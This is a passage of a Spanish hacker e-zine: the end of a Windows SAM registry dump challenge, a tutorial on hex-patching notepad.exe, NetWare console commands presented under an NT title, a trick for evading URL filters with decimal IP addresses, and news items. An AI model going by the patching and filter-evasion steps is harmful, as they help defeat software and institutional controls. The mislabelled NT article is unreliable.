20,02,00,00,01,02,00,00,00,00,00,05,20,00,00,00,20,02,00,00,01,02,00,00,00,\
00,00,05,20,00,00,00,20,02,00,00,41,00,64,00,6d,00,69,00,6e,00,69,00,73,00,\
74,00,72,00,61,00,74,00,6f,00,72,00,73,00,4d,00,65,00,6d,00,62,00,65,00,72,\
00,73,00,20,00,63,00,61,00,6e,00,20,00,66,00,75,00,6c,00,6c,00,79,00,20,00,\
61,00,64,00,6d,00,69,00,6e,00,69,00,73,00,74,00,65,00,72,00,20,00,74,00,68,\
00,65,00,20,00,63,00,6f,00,6d,00,70,00,75,00,74,00,65,00,72,00,2f,00,64,00,\
6f,00,6d,00,61,00,69,00,6e,00,01,05,00,00,00,00,00,05,15,00,00,00,df,55,89,\
47,6a,40,2a,7f,72,0a,14,71,f4,01,00,00,01,05,00,00,00,00,00,05,15,00,00,00,\
df,55,89,47,6a,40,2a,7f,72,0a,14,71,e9,03,00,00

[HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Builtin\Aliases\00000221]
"C"=hex:21,02,00,00,00,00,00,00,b4,00,00,00,02,00,01,00,b4,00,00,00,0a,00,00,\
00,00,00,00,00,c0,00,00,00,1c,00,00,00,00,00,00,00,dc,00,00,00,8c,00,00,00,\
05,00,00,00,01,00,14,80,94,00,00,00,a4,00,00,00,14,00,00,00,30,00,00,00,02,\
00,1c,00,01,00,00,00,02,c0,14,00,13,00,05,01,01,01,00,00,00,00,00,01,00,00,\
00,00,02,00,64,00,04,00,00,00,00,00,14,00,0c,00,02,00,01,01,00,00,00,00,00,\
01,00,00,00,00,00,00,18,00,1f,00,0f,00,01,02,00,00,00,00,00,05,20,00,00,00,\
20,02,00,00,00,00,18,00,1f,00,0f,00,01,02,00,00,00,00,00,05,20,00,00,00,24,\
02,00,00,00,00,18,00,1f,00,0f,00,01,02,00,00,00,00,00,05,20,00,00,00,23,02,\
00,00,01,02,00,00,00,00,00,05,20,00,00,00,20,02,00,00,01,02,00,00,00,00,00,\
05,20,00,00,00,20,02,00,00,55,00,73,00,65,00,72,00,73,00,6c,00,4f,00,72,00,\
64,00,69,00,6e,00,61,00,72,00,79,00,20,00,75,00,73,00,65,00,72,00,73,00,01,\
05,00,00,00,00,00,05,15,00,00,00,df,55,89,47,6a,40,2a,7f,72,0a,14,71,e9,03,\
00,00,01,05,00,00,00,00,00,05,15,00,00,00,df,55,89,47,6a,40,2a,7f,72,0a,14,\
71,ec,03,00,00,01,05,00,00,00,00,00,05,15,00,00,00,df,55,89,47,6a,40,2a,7f,\
72,0a,14,71,f4,03,00,00,01,05,00,00,00,00,00,05,15,00,00,00,df,55,89,47,6a,\
40,2a,7f,72,0a,14,71,f9,03,00,00,01,05,00,00,00,00,00,05,15,00,00,00,df,55,\
89,47,6a,40,2a,7f,72,0a,14,71,ff,03,00,00

[HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Builtin\Aliases\00000222]
"C"=hex:22,02,00,00,00,00,00,00,b4,00,00,00,02,00,01,00,b4,00,00,00,0c,00,00,\
00,00,00,00,00,c0,00,00,00,62,00,00,00,00,00,00,00,24,01,00,00,54,00,00,00,\
03,00,00,00,01,00,14,80,94,00,00,00,a4,00,00,00,14,00,00,00,30,00,00,00,02,\
00,1c,00,01,00,00,00,02,c0,14,00,13,00,05,01,01,01,00,00,00,00,00,01,00,00,\
00,00,02,00,64,00,04,00,00,00,00,00,14,00,0c,00,02,00,01,01,00,00,00,00,00,\
01,00,00,00,00,00,00,18,00,1f,00,0f,00,01,02,00,00,00,00,00,05,20,00,00,00,\
20,02,00,00,00,00,18,00,1f,00,0f,00,01,02,00,00,00,00,00,05,20,00,00,00,24,\
02,00,00,00,00,18,00,1f,00,0f,00,01,02,00,00,00,00,00,05,20,00,00,00,23,02,\
00,00,01,02,00,00,00,00,00,05,20,00,00,00,20,02,00,00,01,02,00,00,00,00,00,\
05,20,00,00,00,20,02,00,00,47,00,75,00,65,00,73,00,74,00,73,00,55,00,73,00,\
65,00,72,00,73,00,20,00,67,00,72,00,61,00,6e,00,74,00,65,00,64,00,20,00,67,\
00,75,00,65,00,73,00,74,00,20,00,61,00,63,00,63,00,65,00,73,00,73,00,20,00,\
74,00,6f,00,20,00,74,00,68,00,65,00,20,00,63,00,6f,00,6d,00,70,00,75,00,74,\
00,65,00,72,00,2f,00,64,00,6f,00,6d,00,61,00,69,00,6e,00,00,00,01,05,00,00,\
00,00,00,05,15,00,00,00,df,55,89,47,6a,40,2a,7f,72,0a,14,71,f5,01,00,00,01,\
05,00,00,00,00,00,05,15,00,00,00,df,55,89,47,6a,40,2a,7f,72,0a,14,71,fb,03,\
00,00,01,05,00,00,00,00,00,05,15,00,00,00,df,55,89,47,6a,40,2a,7f,72,0a,14,\
71,01,04,00,00

[HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Builtin\Aliases\00000223]
"C"=hex:23,02,00,00,00,00,00,00,b4,00,00,00,02,00,01,00,b4,00,00,00,16,00,00,\
00,00,00,00,00,cc,00,00,00,54,00,00,00,00,00,00,00,20,01,00,00,00,00,00,00,\
00,00,00,00,01,00,14,80,94,00,00,00,a4,00,00,00,14,00,00,00,30,00,00,00,02,\
00,1c,00,01,00,00,00,02,c0,14,00,13,00,05,01,01,01,00,00,00,00,00,01,00,00,\
00,00,02,00,64,00,04,00,00,00,00,00,14,00,0c,00,02,00,01,01,00,00,00,00,00,\
01,00,00,00,00,00,00,18,00,1f,00,0f,00,01,02,00,00,00,00,00,05,20,00,00,00,\
20,02,00,00,00,00,18,00,1f,00,0f,00,01,02,00,00,00,00,00,05,20,00,00,00,24,\
02,00,00,00,00,18,00,1f,00,0f,00,01,02,00,00,00,00,00,05,20,00,00,00,23,02,\
00,00,01,02,00,00,00,00,00,05,20,00,00,00,20,02,00,00,01,02,00,00,00,00,00,\
05,20,00,00,00,20,02,00,00,50,00,6f,00,77,00,65,00,72,00,20,00,55,00,73,00,\
65,00,72,00,73,00,20,00,4d,00,65,00,6d,00,62,00,65,00,72,00,73,00,20,00,63,\
00,61,00,6e,00,20,00,73,00,68,00,61,00,72,00,65,00,20,00,64,00,69,00,72,00,\
65,00,63,00,74,00,6f,00,72,00,69,00,65,00,73,00,20,00,61,00,6e,00,64,00,20,\
00,70,00,72,00,69,00,6e,00,74,00,65,00,72,00,73,00

[HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Builtin\Aliases\00000227]
"C"=hex:27,02,00,00,00,00,00,00,84,00,00,00,02,00,01,00,84,00,00,00,20,00,00,\
00,00,00,00,00,a4,00,00,00,62,00,00,00,00,00,00,00,08,01,00,00,00,00,00,00,\
00,00,00,00,01,00,14,80,64,00,00,00,74,00,00,00,14,00,00,00,30,00,00,00,02,\
00,1c,00,01,00,00,00,02,c0,14,00,13,00,05,01,01,01,00,00,00,00,00,01,00,00,\
00,00,02,00,34,00,02,00,00,00,00,00,14,00,0c,00,02,00,01,01,00,00,00,00,00,\
01,00,00,00,00,00,00,18,00,1f,00,0f,00,01,02,00,00,00,00,00,05,20,00,00,00,\
20,02,00,00,01,02,00,00,00,00,00,05,20,00,00,00,20,02,00,00,01,02,00,00,00,\
00,00,05,20,00,00,00,20,02,00,00,42,00,61,00,63,00,6b,00,75,00,70,00,20,00,\
4f,00,70,00,65,00,72,00,61,00,74,00,6f,00,72,00,73,00,4d,00,65,00,6d,00,62,\
00,65,00,72,00,73,00,20,00,63,00,61,00,6e,00,20,00,62,00,79,00,70,00,61,00,\
73,00,73,00,20,00,66,00,69,00,6c,00,65,00,20,00,73,00,65,00,63,00,75,00,72,\
00,69,00,74,00,79,00,20,00,74,00,6f,00,20,00,62,00,61,00,63,00,6b,00,20,00,\
75,00,70,00,20,00,66,00,69,00,6c,00,65,00,73,00,6f,00

[HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Builtin\Aliases\00000228]
"C"=hex:28,02,00,00,00,00,00,00,9c,00,00,00,02,00,01,00,9c,00,00,00,14,00,00,\
00,00,00,00,00,b0,00,00,00,4a,00,00,00,00,00,00,00,fc,00,00,00,00,00,00,00,\
00,00,00,00,01,00,14,80,7c,00,00,00,8c,00,00,00,14,00,00,00,30,00,00,00,02,\
00,1c,00,01,00,00,00,02,c0,14,00,13,00,05,01,01,01,00,00,00,00,00,01,00,00,\
00,00,02,00,4c,00,03,00,00,00,00,00,14,00,0c,00,02,00,01,01,00,00,00,00,00,\
01,00,00,00,00,00,00,18,00,1f,00,0f,00,01,02,00,00,00,00,00,05,20,00,00,00,\
20,02,00,00,00,00,18,00,1f,00,0f,00,01,02,00,00,00,00,00,05,20,00,00,00,24,\
02,00,00,01,02,00,00,00,00,00,05,20,00,00,00,20,02,00,00,01,02,00,00,00,00,\
00,05,20,00,00,00,20,02,00,00,52,00,65,00,70,00,6c,00,69,00,63,00,61,00,74,\
00,6f,00,72,00,53,00,75,00,70,00,70,00,6f,00,72,00,74,00,73,00,20,00,66,00,\
69,00,6c,00,65,00,20,00,72,00,65,00,70,00,6c,00,69,00,63,00,61,00,74,00,69,\
00,6f,00,6e,00,20,00,69,00,6e,00,20,00,61,00,20,00,64,00,6f,00,6d,00,61,00,\
69,00,6e,00,20,00

[HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Builtin\Aliases\Members]
@="("

[HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Builtin\Aliases\Members\S-1-5-21-1200182751
-2133475434-1897138802]
@=hex(9):

[HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Builtin\Aliases\Members\S-1-5-21-1200182751
-2133475434-1897138802\000001F4]
@="?"

[HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Builtin\Aliases\Members\S-1-5-21-1200182751
-2133475434-1897138802\000001F5]
@="?"

[HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Builtin\Aliases\Members\S-1-5-21-1200182751
-2133475434-1897138802\000003E9]
@=hex(2):3f,00,3f,00

[HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Builtin\Aliases\Members\S-1-5-21-1200182751
-2133475434-1897138802\000003EC]
@="?"

[HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Builtin\Aliases\Members\S-1-5-21-1200182751
-2133475434-1897138802\000003F4]
@="?"

[HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Builtin\Aliases\Members\S-1-5-21-1200182751
-2133475434-1897138802\000003F9]
@="?"

[HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Builtin\Aliases\Members\S-1-5-21-1200182751
-2133475434-1897138802\000003FB]
@="?"

[HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Builtin\Aliases\Members\S-1-5-21-1200182751
-2133475434-1897138802\000003FF]
@="?"

[HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Builtin\Aliases\Members\S-1-5-21-1200182751
-2133475434-1897138802\00000401]
@="?"

[HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Builtin\Aliases\Names]
@=hex(0):

[HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Builtin\Aliases\Names\Administrators]
@=hex(220):

[HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Builtin\Aliases\Names\Backup Operators]
@=hex(227):

[HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Builtin\Aliases\Names\Guests]
@=hex(222):

[HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Builtin\Aliases\Names\Power Users]
@=hex(223):

[HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Builtin\Aliases\Names\Replicator]
@=hex(228):

[HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Builtin\Aliases\Names\Users]
@=hex(221):

[HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Builtin\Groups]
@=hex(0):

[HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Builtin\Groups\Names]
@=hex(0):

[HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Builtin\Users]
@=hex(0):

[HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Builtin\Users\Names]
@=hex(0):

[HKEY_LOCAL_MACHINE\SAM\SAM\RXACT]
@=hex(0):01,00,00,00,94,64,14,00,94,fe,12,00


====================================== FIN ===================================

Autor : EleKtr0
Titulo : Challenge_NT "regedit32.exe"
Entrega # : II
Respuestas: elektro@electron-team.com







,øñ°`´°ñø¸
-<[ 11 ]>-
`°ñø,¸,øñ°


Autor : ZychoLezz
Titulo : Crackeando Mensajes con un Hex-Editor
Comentario: Te abra salido al abrir la zine
Contenido : Bueno en este tutorial, tratare de explicar como crackear el
mensaje que sale en el notepad cuando abres un archivo que pesa mas de 60 kb.
Esto tambien puede servir para crackear mensajes de register tambien que te
salen al abir un programa.Obviamente que ha a todos nos ha pasado que cuando
abrimos un archivo de mas de 60 kb en el notepad, sale un mensaje que dice:

"This file is too large for notepad to open. Would you like to use wordpad
to read this file?"


lo que quiere decir en español:

"Este archivo es muy largo para abrirlo con el notepad. Quisiera abrirlo
usando el wordpad?"
.

Bueno, lo que haremos sera eliminar este mensaje, cosa que entremos
automaticamente al wordpad sin que nos pregunten, ok?

Las cosas que necesitaremos son cuatro:

- W32dasm u otra desensenblador
- Hiew
- Notepad.exe
- Un cerebro (...y saber ocuparlo!)

Todo esto se puede conseguir facilmente en http://astalavista.box.sk, menos
el cerebro. Lo primero que haremos sera desensamblar el Notepad.exe. Te
recomiendo hacer una copia del notepad.exe y utilizar esa copia para
crackearlo ya que puedes equivocarte al hacer algo mal y talvez el
Notepad.exe del directorio c:\windows sea solo de lectura y no puedas editarlo
en el Hiew.

Se desensambla rapido el Notepad.exe, ya que pesa alrededor de 50 kb. Ahora
talvez no entiendes mucho lo que sale, pero sigue mis pasos. Haz click en el
menu "refs" y luego en "string data references". Aca estaran todos los
mensajes que se muestran en el programa, por lo tanto busca el mensaje:
" This file is too large for notepad to open. Would you like to use
wordpad to read this file?"
Listo? Cuando lo encuentres haz doble click en el
Saldra lo siguiente: (lo pongo entre [])

[

*Referenced by a (U)nconditional or (C)onditional jump a address:
|:00402AA9 (C)
|
*Possibly referenced to String Resource ID=00052: " T his file is too large for
notepad to open. Would you like to use wordpad to read this file?"


:00402ABF 6A34 push 00000034
:00402AC1 BEA0564000 mov esi, 004056A0
:00402AC6 56 push esi

]

No nos sirve de mucho, ya que si fueramos a modificar el Conditional Jump at
address: 00402AA9 ,hariamos que el Notepad supusiese que el archivo k abriera
fuera de menos tamaño que de 60 kb. Eso podria causar errores en el
funcionamiento del programa y lo que queremos hacer es quitar el mensaje k
sale, no echar a perder el Notepad y dejar a Windows en un peor funcionamiento
de lo que ya esta. Entonces lo que haremos ahora sera buscar con el
desensamblador el mensaje y eliminarlo.

Haz click en "Functions" y luego en "Imports". Estas son las funciones de
windows que el Notepad importa para correr el programa.

Busca la funcion "User32.MessageBoxA". Esta responde a los "message boxes"
donde los mensajes son mostrados. Haz doble click en el y llegamos a los
siguiente:

[

* Reference to: USER32.MessageBoxA, Ord: 01ACh
|
:004033B1 FF15A8644000 Call dword ptr [004064A8]
:004033B7 0F806 cmp eax, 00000006
:004033BA 0F85A7000000 jne 00403467
:004033CO 6804010000 push 00000104
:004033C5 8D858CFDFFFF lea eax, dword ptr [ebp+FFFFFD8C]
:004033CB 837D1001 cmp dword ptr [ebp+10], 00000001
:004033CF 1BFF sbb edi, edi
:004033D1 50 push eax
:004033D2 83C737 add edi, 00000037

]


Como podemos aprecir, aca es cuando el programa llama al "message box" y echa
a correr el wordpad o se sale, dependiendo de nuestra decision.

Si vemos bien, en 004033B1, el Notepad llama al "message box" y en el
004033BA, salta y sale si "EAX" no es igual a 00000006. Lo que haremos sera
quitar el mensaje de 004033B1 y quitar el salto en 004033BA, cosa de que el
programa se vaya al Wordpad automaticamente.

Lo primero que hay que hacer es tomar nota de los "Offset Location". Si notas
bien, la linea de mas arriba tiene un color especial y abajo muestra algo asi:

"Line: 5467 Pg. 71 of 127 Code Data @:004033b1 @Offset 000033B1h in file
Notepad.exe"


Ponte encima de la linea donde esta el "call", que es esta:

:004033B1 FF15A8644000 Call dword ptr [004064A8]

y anota lo que sale despues del @Offset.


Luego ponte encima de la otra linea donde esta el "jump", es esta:

:004033BA 0F85A7000000 jne 00403467

y anota lo que sale despues del @Offset.


Deberias haber anotado esto en la linea del "call" que te dije:

@offset 000033B1


Deberias haber anotado esto en la linea del "jump":

@offset 00033BA

Ahora se puede cerrar el W32dasm y se puede comenzar a crackear el programa.
Abre el Notepad.exe en el Hiew. Presiona "F4" y elige "decode". Ahora presiona
"F5" que es el para buscar y pon lo que sale despues del @Offset de la primera
linea que anotaste, que es 000033B1. Presiona "F3" para editar y escribe lo
siguiente:

"404840484048", sin las comillas y luego presiona "F9" para guardar. Ahora
presiona "F5", que es el para buscar y pon lo que sale despues del @Offset
de la segunda linea que anotaste, que deberia ser: 000033BA. Presiona "F3"
para editar y escribe lo siguiente:

"404840484048", sin las comillas y luego presiona "F9" para guardar.

Listo!.El programa esta crackeado,intenta abrir algun archivo mayor de 60 kb.
y entrara al Wordpad automaticamente sin preguntarte nada. Ahora puedes hacer
otra copia del notepad.exe y sobreescribir la que esta en el directorio
c:\windows. Intenta abrir algun archivo mayor de 60 kb. y no te hara la
pregunta, sino que entrara al Wordpad de inmediato.

Para entender lo que hicimos, tienes que saber que en Hex, el numero 40
significa "inc eax" o sea suma uno. El numero 48 es "dec eax" o sea quita uno
y el 90 es "nop", o sea que haga nada. Lo que hicimos para remover las
instrucciones "call" y "jne", fue suma 1 a "eax", luego restar uno a "eax"
y asi sucesivamente. Te preguntaras porque no solo pusimos 90 y chao no mas,
lo que pasa es que algunos programas revisan si es que hay 90's y si los hay
no funkan, pero obviamente el Notepad no lo hace...

Bueno ahi tamos listos, tenemos crackeado el Notepad, pero hay mucho de que
aprender sobre cracking, como hacer patches o registrar programas.


Autor : ZychoLezz
Titulo : Crackeando Mensajes con un Hex-Editor
E-mail : ZychoLezz@altavista.com







,øñ°`´°ñø¸
-<[ 12 ]>-
`°ñø,¸,øñ°

Autor : EleKtr0
Titulo : Administrando un NT Desde la Consola
Comentario: Muchos Admin solo se limitan a usar el modo grafico del NT como una
unica alternativa a la administracion de un server, mirando esto desde un punto
de vista objetivo y al obserbar de forma critica el asunto, nos daremos cuenta
que muchos piensan esto y aun mas, creen que es la mejor/unica opcion para no
cometer errores, sin embargo y de todas formas los errores aun persisten en la
administracion, entonces de acuerdo a esto, ¿se le debe echar la culpa al tipo
de herramienta que se utilise para administrar o al tipo de entorno al cual se
enfrente un admin, a la hora de hacer bien su trabajo?¿ yo mas bien descarto
ambas posibilidades y es mas! agrego una, que seria la mera ignorancia del tipo
que se hace llamar administrador de sistemas, quisa un poco duro pero es cierto
si estos señores supieran hacer bien su trabajo se ahorrarian muchos dolores de
cabeza y por supuesto nos darian unos tantos dolores a nosotros tambien ;)

Un buen admin debe conocer a fondo y manejar al %100 todas las posibilidades k
ofrece una herramineta a la hora de administrar, es por esto k en este articulo
pretendo dar a conocer una herramienta distinta de administracion del NT,su mal
ponderada y desvalida Consola, para esto usaremos NetWare 3.X

Contenido : Los comandos de la consola del NT tienen la peculiaridad que solo
puede ejecutarse desde el servidor, cuando este se encuentra en modo consola
El ingreso a este modo es para los "Operadores de Consola" y el "Supervisor"
Existe otra forma de ejecutar comandos de consola sin necesidad de estar
trabajando en el servidor;esto es posible gracias al programa RCONSOLE incluido
en NetWare a partir de la version 3.11 y que veremos mas adelante.

Las ordenes de consola se pueden agrupar segun la clase de tareas que realizan.
A partir de NetWare 3.X pueden estar cargados en el servidor varios modulos,
pudiendo algunos de ellos abrir ventanas para su monitoreo o ejecucion; por lo
que se decidio agregar combinaciones de teclas que permitan ejecutar los
siguientes procedimientos:

CTRL + ESC: permite seleccionar una ventana que se desee ver en particular
ALT + ESC: permite ir de una ventana a otra en forma similar al Windows
LOAD se utiliza para cargar modulos NLM (reemplazan a los VAP's a partir de
NetWare 3.11)
UNLOAD se utiliza para descargarlos


Desconexion del server:
======================

DOWN: Obviamente, se debe ejecutar una vez que no hay usuarios trabajando en la
red Es la forma de asegurar k toda informacion k este en la memoria del server
sea bajada a disco antes de interrumpir el suministro de energia


Envio de mensajes:
=================
BROADCAST: Se usa para transmitir un mensaje de hasta 60 caracteres a todos los
usuarios Uno de sus usos mas frecuentes es el anuncio de la inminente
desconexion del server, sintaxis de uso:

BROADCAST mensaje

SEND: Es para enviar mensajes de hasta 40 caracteres a ciertas estaciones, las
estaciones se identifican por su numero, sintaxis de uso:

SEND "mensaje" TO #estacion, #estacion, ...

CLEAR MESSAGE: Borra de la pantalla los mensajes recibidos en la consola


Estado del server:
=================

CONFIG: Muestra la configuracion de cada placa de red soportada por el server,
no se lee de la placa en si, sino k los archivos creados al instalar el server

NAME: Muestra el nombre del server Este comando no es necesario (pero sigue
existiendo) a partir de NetWare 3.12 ya que por defecto el nombre del servidor
forma parte del prompt

SET TIME: En realidad, no solo sirve para la hora sino tambien para la fecha,
sintaxis de uso:

SET TIME mes/dia/año hora:minutos:segundos AM (o PM)


Debido a k los equipos y los programas que se utilizan pueden ser muy diversos,
suelen configurarse algunos campos luego de la instalacion para optimizar el
sistema o para incluir soporte para algo que se haya agregado Como son muchos
parametros los k se pueden ajustar y ademas su sintaxis es bastante especifica
se incluye un menu k comprende los parametros k se pueden configurar, valores
minimos, maximos y por defecto, ahora veamos un poco estos menus:

El menu tiene 9 opciones a saber:

- Communications
- Memory
- File caching
- Directory caching
- File system
- Locks
- Transaction tracking
- Disk
- Miscellaneous


Manejo de los discos:
====================

DISMOUNT y MOUNT: Se usa solo si en el server hay discos rigidos removibles, o
varios volumenes

DISMOUNT: se emite antes de "bajar" un volumen y MOUNT al introducirlo, si no
hay discos removibles y existe el volumen SYS solamente, el sistema operativo
lo "monta" automaticamente

REMIRROR: y UNMIRROR: Se emplean solo en las versiones SFT, cuando se trabaja
con discos espejados y uno de ellos falla, se lo saca de sistema con UNMIRROR,
sintaxis:

UNMIRROR xx
REMIRROR xx


Manejo de estaciones de trabajo:
===============================

MONITOR: permite saber que archivos tiene en uso cada estacion, sintaxis:

LOAD MONITOR

DISABLE LOGIN: Tiene por proposito evitar el ingreso de nuevos usuarios al
sistema

ENABLE LOGIN: Anula el efecto de un DISABLE LOGIN previamente ejecutado

Monitoreo de la UPS: Netware provee un comando para monitorear la UPS del
server, siempre que se trate de un modelo reconocido por Novell o que haga uso
de la placa detectora de estado de UPS de Novell

Monitoreo de la red: Consiste en mostrar informacion sobre los paquetes de
datos que viajan por la red. IN se refiere a los recibidos por el server y OUT
a los emitidos por el.

TRACK ON activa el seguimiento.
TRACK OFF lo desactiva.


Trabajo del TTS:
===============
A veces,un admin desea eliminar temporalmente el sistema de transacciones para
efectuar alguna prueba A tal fin, se proveen los comandos:

DISABLE TTS para inhabilitar el TTS.
ENABLE TTS para habilitar el TTS.


Manejo remoto del servidor:
==========================
Se puede acceder en forma remota mediante el comando RCONSOLE provisto a partir
de NetWare 3.11. Para poder acceder mediante este utilitario se deben cargar
previamente 2 modulos en el servidor. Dichos modulos son REMOTE.NLM ( pide una
clave de acceso a utilizar cuando se invoque RCONSOLE ) y RSPX. Dichos modulos
deben cargarse en ese orden, de lo contrario no se podra acceder con el
utilitario deseado. Al cargar RCONSOLE en la terminal, aparece en pantalla con
el/los servidor/es habilitados para acceso remoto;selccionando alguno accedemos
a la ventana en la que se encuentre en ese momento. Presionando - o + pueden
recorrerse las ventanas igual que en el servidor con ALT + ESC. Para ejecutar
algunas acciones y finalizar la operacion remota del servidor,puede presionarse
la tecla *. Esta tecla presenta un menu con las siguientes opciones:

Select A Screen To View (Selecciona una pantalla a visualizar igual que CTRL +
ESC en el servidor)

Directory Scan (Permite examinar el contenido de directorios)

Transfer Files To Server (Permite cargar algun software en el servidor desde la
terminal)

Copy System And Public Files (Permite bajar esos diskettes en caso de falta de
alguno)

Shell To Operating System (Permite salir para efectuar alguna prueba y volver
nuevamente)

End Remote Session With Server (Shift + Esc)

Resume Remote Session With Server (Esc)

Se debe tener en cuenta que los cambios entre pantallas mediante ALT + ESC que
se efectuen en el servidor afectan tambien a la terminal en que se esta
corriendo RCONSOLE, para evitarlo, presionar el *.

Como conclusion evidente surge que el acceso a RCONSOLE deberia restringirse a
supervisores y File Server Console Operators unicamente.

Eso seria mas o menos para dar una breve y basica idea de la administracion por
medio de la Consola...


Autor : EleKtr0
Titulo : Administrando un NT Desde la Consola
E-mail : elektro@electron-team.com







,øñ°`´°ñø¸
-<[ 13 ]>-
`°ñø,¸,øñ°

Autor : bAnkZide
Titulo : Como Saltarnos los URL Filters
E-mail : bankzide@electron-team.com
Contenido : Bueno, aqui vamos de nuevo con algo que de seguro les va a
interesar, al igual como me intereso a mi. Puede que muchos ya conozcan este
metodo, pero lo importante aqui es ke aprendas mas cosas y para eso estamos
todos nosotros.

Lo que aki les voy a mostrar es otra manera de ingresar a servidores, jugando
con los sistemas numericos (binario, decimal sabes lo ke son, no?). Pero, para
ke otra forma de entrar a servidores ? Ya veran para ke. Vamos a lo nuestro...

Primero eligamos algun servidor como ejemplo, para este articulo eligi
www.congreso.cl. Les parece conocido? Como ven, desde nuestro browser podemos
escribir www.congreso.cl y tambien su respectiva direccion IP.

Nosotros queremos ahora averiguar la IP. Te recomiendo hacerle un NsLookUp.
Para eso anda a http://www.simplelogic.com/simple/net_utils/nslookup.asp.

Desde ahi te mostrara la IP del servidor que kieras y de paso tambien puedes
utilizar las otras herramientas que hay. Tb hay software ke hace nslookups, es
cosa de buscar. Tambien cuando ingresas una url en el Internet Explorer, te
muestra la ip en el status bar,pero tienes ke ser rapido para apuntarla(tipico
de micro$oft).

Ahora para los mas avanzados y k usan linux, esta el comando nslookup.

# nslookup www.congreso.cl

Ya echo el nslookup a www.congreso.cl nos dio como ip 200.9.122.4. Pero que es
este numero? es solo el numero puntuado de 32 bits. Para seguir tomemos los
cuatro valores individualmente,es decir 200, 9, 122 y el 4 Vamos a transformar
cada uno binario.

200 = 11001000 Bin
9 = 00001001 Bin
122 = 01111010 Bin
4 = 00000100 Bin

Estos numeros tienen ke completar 8 digitos en Binario, por ejemplo, el 9 dec
en bin es 1001 pero le agregamos cuatro 0 para ke complete los 8. Haz lo mismo
con los numeros ke no tengan 8 , no ke le agreges 4 ceros, sino los ke le
falten.

Este proceso de conversion lo hize a traves de la calculadora de Windows, si
quieres saber como se puede hacer manual y aprender mas, en Nokeyz 4 hay
explicaciones de esto.

Teniendo el numero, juntemos los bin y hagamos uno solo, en este caso:
11001000000010010111101000000100.

Este lo convertimos a decimal y nos da: 3356064260. Bien, ahora solo tenemos
que ir a http://3356064260 y llegamos a www.congreso.cl.

Facil, no? Ahora explicare para que esto. No se si te habra pasado pero en
ciertas empreses, corporaciones y colegios, blokean paginas con programas como
Netnanny y Surfwatch, por mencionar algunos. Estos definen a www.sex.com como
una url para adultos y por lo tanto no apta para escolares ni para horas de
trabajo, eh? Por lo tanto si estuvieras bajo estos URL Filters (Filtros),no te
dejaria verla y en otro caso te pediria un password para desblokearla y verla.

Pero si haces lo ke hicimos con www.congreso.cl la verias sin problemas.Conste
ke el congreso no esta blokeada, era solo para dar un ejemplo.

Muchas veces estos URL Filters clasifican mal algunos sitios ke no tienen nada
inaceptable, pero ya (por el bien) estan pasando de moda, por ke no son
eficientes y generalmente lo unico ke hacen es cagarte sin poder tener accesso
a la cual otros si pueden tener.La informacion debe ser libre y cada uno sabra
que ver y que no, y no que otras personas tomen la decision por uno.
¡ No a la censura !

Autor : bAnkZide
Titulo : Como Saltarnos los URL Filters
E-mail : bankzide@electron-team.com







,øñ°`´°ñø¸
-<[ 14 ]>-
`°ñø,¸,øñ°


Autor : EleKtr0
Titulo : UnderNews
Fuentes : www.linux-chile.org // www.hispasec.com

InstallFest Linux
^^^^^^^^^^^^^^^^^
El dia 4 de Noviembre se llevo a cabo la InstallFest Linux,uno de los primeros
eventos masivos de Linux en el pais, se presento a Linux como una alternativa
fiable, estable y potente a la hora de elegir un buen SO, el evento resulto
bastante novedoso y motivador en el sentido de que varios tubimos k viajar a
esta reunion en santiago y de paso conocimos a nuestros partner`s de IRC




Primer Encuentro Nacional Linux
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Los dias 24 y 25 de Noviembre se llevo a cabo en la Universidad del Bio-Bio,el
Primer Encuentro Nacional Linux. Este evento se desarrolo en la misma tematica
que el otro aunque este fue un poco mas profundo, bien por la gente linuxera
nacional k se esta moviendo por difundir de buena manera este hermoso SO




Alertas de seguridad informatica via SMS
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Fruto de la colaboracion tecnologica entre Hispasec y MyAlert, empresas
pioneras en su genero, y el apoyo estrategico de la Asociacion de Internautas,
se presenta el primer servicio de alertas de virus y seguridad informatica via
SMS que todos los usuarios interesados podran recibir de forma gratuita.

Una vez mas Hispasec da un paso adelante, y crea con la colaboracion
tecnologica del portal MyAlert el primer servicio de informacion de alertas
viricas y de seguridad a traves de SMS. El objetivo principal de este nuevo
servicio es ofrecer la informacion mas puntual y actualizada a todos los
interesados en mantener la seguridad de sus equipos protegidos de los
principales riesgos de la Red. La Asociacion de Internautas, convencida del
interes general que presenta este servicio,se une al proyecto con el objeto de
hacer llegar a todos los internautas estas alertas.




El gusano "Energy", capaz de insertarse en ficheros RAR
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Desde la aparicion de "Happy99", el primer "i-worm" conocido, ya hace casi dos
años, este genero de "malware" ha evolucionado rapidamente, y ha llegado a
convertirse en la mayor amenaza para el usuario final,debido a la versatilidad
reproductiva que caracteriza a la practica totalidad de los especimenes que lo
integran. Sin embargo, tambien existe un hueco para la originalidad y la
